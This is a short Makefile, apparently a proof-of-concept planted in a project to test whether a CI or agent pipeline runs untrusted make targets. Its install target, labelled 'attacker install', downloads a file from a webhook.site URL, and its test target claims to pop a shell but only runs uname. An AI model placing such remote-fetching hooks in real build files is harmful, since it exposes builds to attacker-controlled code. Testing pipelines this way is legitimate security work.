install:
	@echo "running attacker install"
	apt install curl;
	wget https://webhook.site/TestActions/google-adk-samples/test5;

lint:
	@echo "do nothing"

test:
	@echo "popping a shell"; uname -a

backend:
	@echo "pretend to start a server"; sleep 1
